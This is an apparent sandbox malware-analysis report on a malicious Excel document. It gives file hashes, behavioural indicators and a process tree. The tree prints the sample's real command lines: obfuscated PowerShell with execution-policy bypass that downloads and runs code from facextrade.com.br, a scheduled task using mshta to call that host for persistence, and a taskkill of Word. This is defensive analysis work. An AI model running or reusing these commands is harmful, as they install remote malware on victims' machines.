Analysis
max time kernel: 102s
max time network: 153s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 16-08-2022 07:45
Behavioral task: behavioral1
Sample: SecuriteInfo.com.Exploit.Siggen3.17232.9077.xls
Resource: win7-20220812-en
Behavioral task: behavioral2
Sample: SecuriteInfo.com.Exploit.Siggen3.17232.9077.xls
Resource: win10v2004-20220812-en
General
Target: SecuriteInfo.com.Exploit.Siggen3.17232.9077.xls
Size: 33KB
MD5: 78a8eef1db5dba3faff2bead626f205a
SHA1: dea2b77ef05fa0374377f71fb46a226a47124b2c
SHA256: 3598a4f8d24a8fbf222fff1b413c7b8409a0f7e099a37c0b1476c6928e76e688
SHA512: aef9e5d9502278c19b82b5f3e57bb57833d7d54c2d1631935df4c509ce2753fb2646a2b82c4eccd9a3d198026011dee3a759ce350fa98facf58142ac0cfafd68
Malware Config
Signatures
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes: cmd.exe, cmd.exe, cmd.exe, cmd.exe
description | pid | pid_target | process | target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 4836 | 3220 | cmd.exe | EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 4884 | 3220 | cmd.exe | EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 5056 | 3220 | cmd.exe | EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 4780 | 3220 | cmd.exe | EXCEL.EXE
Blocklisted process makes network request 2 IoCs
Processes: powershell.exe, powershell.exe
flow | pid | process
39 | 4388 | powershell.exe
53 | 3020 | powershell.exe
Drops file in System32 directory 6 IoCs
Processes: svchost.exe
description | ioc | process
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{CC5A5A47-3725-4138-900D-1FB5C5AFBB6E}.catalogItem | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{A471C7D9-5625-4540-9362-E89158221A16}.catalogItem | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{B9BAD1D1-48AE-4F32-9F6B-321036BBEA1C}.catalogItem | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{DD2CE6FB-931A-431E-A78F-E2E4A4604349}.catalogItem | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{04C833F0-E5E8-4130-97DE-C90F47890597}.catalogItem | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{FFD60803-3B8A-4A0E-87C5-75D4A04286AD}.catalogItem | svchost.exe
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes: svchost.exe, EXCEL.EXE
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | svchost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | svchost.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | svchost.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 5 IoCs
Processes: EXCEL.EXE, svchost.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | svchost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | svchost.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
Kills process with taskkill 1 IoCs
Processes: taskkill.exe
pid | process
816 | taskkill.exe
Runs ping.exe 1 TTPs 4 IoCs
Processes: PING.EXE, PING.EXE, PING.EXE, PING.EXE
pid | process
4496 | PING.EXE
1708 | PING.EXE
404 | PING.EXE
960 | PING.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes: EXCEL.EXE
pid | process
3220 | EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes: powershell.exe, powershell.exe
pid | process
4388 | powershell.exe
4388 | powershell.exe
3020 | powershell.exe
3020 | powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes: taskkill.exe, powershell.exe, powershell.exe
description | pid | process
Token: SeDebugPrivilege | 816 | taskkill.exe
Token: SeDebugPrivilege | 4388 | powershell.exe
Token: SeDebugPrivilege | 3020 | powershell.exe
Suspicious use of SetWindowsHookEx 12 IoCs
Processes: EXCEL.EXE
pid | process
3220 | EXCEL.EXE
3220 | EXCEL.EXE
3220 | EXCEL.EXE
3220 | EXCEL.EXE
3220 | EXCEL.EXE
3220 | EXCEL.EXE
3220 | EXCEL.EXE
3220 | EXCEL.EXE
3220 | EXCEL.EXE
3220 | EXCEL.EXE
3220 | EXCEL.EXE
3220 | EXCEL.EXE
Suspicious use of WriteProcessMemory 32 IoCs
Processes: EXCEL.EXE, cmd.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe
description | pid | process | target process
PID 3220 wrote to memory of 4836 | 3220 | EXCEL.EXE | cmd.exe
PID 3220 wrote to memory of 4836 | 3220 | EXCEL.EXE | cmd.exe
PID 3220 wrote to memory of 4884 | 3220 | EXCEL.EXE | cmd.exe
PID 3220 wrote to memory of 4884 | 3220 | EXCEL.EXE | cmd.exe
PID 3220 wrote to memory of 5056 | 3220 | EXCEL.EXE | cmd.exe
PID 3220 wrote to memory of 5056 | 3220 | EXCEL.EXE | cmd.exe
PID 3220 wrote to memory of 4780 | 3220 | EXCEL.EXE | cmd.exe
PID 3220 wrote to memory of 4780 | 3220 | EXCEL.EXE | cmd.exe
PID 4836 wrote to memory of 1708 | 4836 | cmd.exe | PING.EXE
PID 4836 wrote to memory of 1708 | 4836 | cmd.exe | PING.EXE
PID 5056 wrote to memory of 4496 | 5056 | cmd.exe | PING.EXE
PID 5056 wrote to memory of 4496 | 5056 | cmd.exe | PING.EXE
PID 4780 wrote to memory of 404 | 4780 | cmd.exe | PING.EXE
PID 4780 wrote to memory of 404 | 4780 | cmd.exe | PING.EXE
PID 4884 wrote to memory of 960 | 4884 | cmd.exe | PING.EXE
PID 4884 wrote to memory of 960 | 4884 | cmd.exe | PING.EXE
PID 5056 wrote to memory of 1620 | 5056 | cmd.exe | cmd.exe
PID 5056 wrote to memory of 1620 | 5056 | cmd.exe | cmd.exe
PID 1620 wrote to memory of 4388 | 1620 | cmd.exe | powershell.exe
PID 1620 wrote to memory of 4388 | 1620 | cmd.exe | powershell.exe
PID 5056 wrote to memory of 1888 | 5056 | cmd.exe | cmd.exe
PID 5056 wrote to memory of 1888 | 5056 | cmd.exe | cmd.exe
PID 1888 wrote to memory of 816 | 1888 | cmd.exe | taskkill.exe
PID 1888 wrote to memory of 816 | 1888 | cmd.exe | taskkill.exe
PID 4836 wrote to memory of 1668 | 4836 | cmd.exe | cmd.exe
PID 4836 wrote to memory of 1668 | 4836 | cmd.exe | cmd.exe
PID 1668 wrote to memory of 3020 | 1668 | cmd.exe | powershell.exe
PID 1668 wrote to memory of 3020 | 1668 | cmd.exe | powershell.exe
PID 4884 wrote to memory of 4688 | 4884 | cmd.exe | cmd.exe
PID 4884 wrote to memory of 4688 | 4884 | cmd.exe | cmd.exe
PID 4688 wrote to memory of 4668 | 4688 | cmd.exe | schtasks.exe
PID 4688 wrote to memory of 4668 | 4688 | cmd.exe | schtasks.exe
Processes
- C:\Windows\System32\svchost.exe (level 1)
  command line: C:\Windows\System32\svchost.exe -k netsvcs -p
  - Drops file in System32 directory
  - Checks processor information in registry
  - Enumerates system info in registry
- C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (level 1)
  command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen3.17232.9077.xls"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SYSTEM32\cmd.exe (level 2)
    command line: cmd /c ping -n 80 127.0.0.1 & %public%\Outlook.bat exit
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\PING.EXE (level 3)
      command line: ping -n 80 127.0.0.1
      - Runs ping.exe
    - C:\Windows\system32\cmd.exe (level 3)
      command line: cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
      - Suspicious use of WriteProcessMemory
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 4)
        command line: PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\cmd.exe (level 2)
    command line: cmd /c ping -n 85 127.0.0.1 & %public%\task.bat exit
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\PING.EXE (level 3)
      command line: ping -n 85 127.0.0.1
      - Runs ping.exe
    - C:\Windows\system32\cmd.exe (level 3)
      command line: cmd /c schtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\schtasks.exe (level 4)
        command line: schtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F
        - Creates scheduled task(s)
  - C:\Windows\SYSTEM32\cmd.exe (level 2)
    command line: cmd /c ping -n 10 127.0.0.1 & %public%\DefenderFile.bat exit
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\PING.EXE (level 3)
      command line: ping -n 10 127.0.0.1
      - Runs ping.exe
    - C:\Windows\system32\cmd.exe (level 3)
      command line: cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
      - Suspicious use of WriteProcessMemory
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 4)
        command line: PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\cmd.exe (level 3)
      command line: cmd /c start /min taskkill /f /im WINWORD.EXE
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\taskkill.exe (level 4)
        command line: taskkill /f /im WINWORD.EXE
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\cmd.exe (level 2)
    command line: cmd /c ping -n 7 127.0.0.1 & %public%\KilFile.bat exit
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\PING.EXE (level 3)
      command line: ping -n 7 127.0.0.1
      - Runs ping.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
  SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
  SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
  SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 4267fc1e87ee23aeb8b9a7d0497091c5
  SHA1: 59ddae7dc44b8317ff933ad113493eb1644c52c0
  SHA256: ff7daa872dda2a5fc4ce7a687bb4193774abb607d489887ffdbbd0ef71bc0d8d
  SHA512: 1d1b048dc3f01680f4049c23db8e4450f2d59a1174184a340e712d6e4340b3ab6191a254986c98743c5374a693733bfa6ff255b62a7b43809bd79c0804be2beb
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 6KB
  MD5: aa51e5e20be1448c0591e05d784b59bf
  SHA1: 5224a48f5cd72577e4b09f2710573f0997f14632
  SHA256: d8488d28a56e4daaf7f85162b16dd31f10e8f95567d99c494eb3e5340075d2d3
  SHA512: 431585e8f69e0efa4252e9d1da1dc7841f10ecd0facd175aa5de42712bbfc4d8c46c0083814e32d1ce1cfecdb8cf679befeb6346621c95786caa681fe354316c
- C:\Users\Public\DefenderFile.bat
  Filesize: 1KB
  MD5: ae4a0997ce01f4ebbb3f3cc0054ce933
  SHA1: e5bfe3b390f1208b8b6ea0317f4364005f552851
  SHA256: a33dd1505c2ac665e6e1fd424a048997ec0f43914b8f73037bd94dc2e89e35ce
  SHA512: 5de2f43af7756cd7be659d6f03314240e08ecfee7bcb97b45f828ef938a0a0a84b0c36667d0447fd5bfa4851e5eef9cf98182933bda86b42af4a154b37b2f184
- C:\Users\Public\Outlook.bat
  Filesize: 900B
  MD5: 0427a3545c2eaed3167cffe2cf5f8aba
  SHA1: b27f3a7d2b855f1d0b84727603add711bb6f6170
  SHA256: ec7da386a5fc7007e33ffdcd8ab64b6ac207d1886e04b9b60f27a95533347391
  SHA512: fafb712a5b636c0118128c2d448271680e66fc73fac67538f4b84c9917a7053470d7710ce508cfd82c941942e469bd3d048d7ebbcefa99797542ad026dfe038b
- C:\Users\Public\task.bat
  Filesize: 954B
  MD5: 20a395a26f50352dc994664c3e7df533
  SHA1: 9b6407d22297b7af7c49aacd51bf42e51ced7029
  SHA256: c6c13b53153f21b2486096732847ddb48b8eb888bd3d6ab93ee1f958fcea1b32
  SHA512: 2b974da0b7859584e39a9afa2fdf74fb1efba58e68d0c7b420065254f2cf017a8eb393c5f061a12f6ea79c729cebf5f81749b8cf14159ad331aae1daa7701617
- memory/404-145-0x0000000000000000-mapping.dmp
- memory/816-151-0x0000000000000000-mapping.dmp
- memory/960-146-0x0000000000000000-mapping.dmp
- memory/1620-148-0x0000000000000000-mapping.dmp
- memory/1668-156-0x0000000000000000-mapping.dmp
- memory/1708-143-0x0000000000000000-mapping.dmp
- memory/1888-150-0x0000000000000000-mapping.dmp
- memory/3020-157-0x0000000000000000-mapping.dmp
- memory/3020-162-0x00007FF9FB2E0000-0x00007FF9FBDA1000-memory.dmp (Filesize: 10.8MB)
- memory/3020-161-0x00007FF9FB2E0000-0x00007FF9FBDA1000-memory.dmp (Filesize: 10.8MB)
- memory/3220-133-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp (Filesize: 64KB)
- memory/3220-135-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp (Filesize: 64KB)
- memory/3220-132-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp (Filesize: 64KB)
- memory/3220-170-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp (Filesize: 64KB)
- memory/3220-169-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp (Filesize: 64KB)
- memory/3220-168-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp (Filesize: 64KB)
- memory/3220-167-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp (Filesize: 64KB)
- memory/3220-138-0x00007FF9E17C0000-0x00007FF9E17D0000-memory.dmp (Filesize: 64KB)
- memory/3220-137-0x00007FF9E17C0000-0x00007FF9E17D0000-memory.dmp (Filesize: 64KB)
- memory/3220-134-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp (Filesize: 64KB)
- memory/3220-136-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp (Filesize: 64KB)
- memory/4388-154-0x00007FF9FB2E0000-0x00007FF9FBDA1000-memory.dmp (Filesize: 10.8MB)
- memory/4388-149-0x0000000000000000-mapping.dmp
- memory/4388-153-0x00007FF9FB2E0000-0x00007FF9FBDA1000-memory.dmp (Filesize: 10.8MB)
- memory/4388-152-0x0000021CF4870000-0x0000021CF4892000-memory.dmp (Filesize: 136KB)
- memory/4496-144-0x0000000000000000-mapping.dmp
- memory/4668-165-0x0000000000000000-mapping.dmp
- memory/4688-164-0x0000000000000000-mapping.dmp
- memory/4780-142-0x0000000000000000-mapping.dmp
- memory/4836-139-0x0000000000000000-mapping.dmp
- memory/4884-140-0x0000000000000000-mapping.dmp
- memory/5056-141-0x0000000000000000-mapping.dmp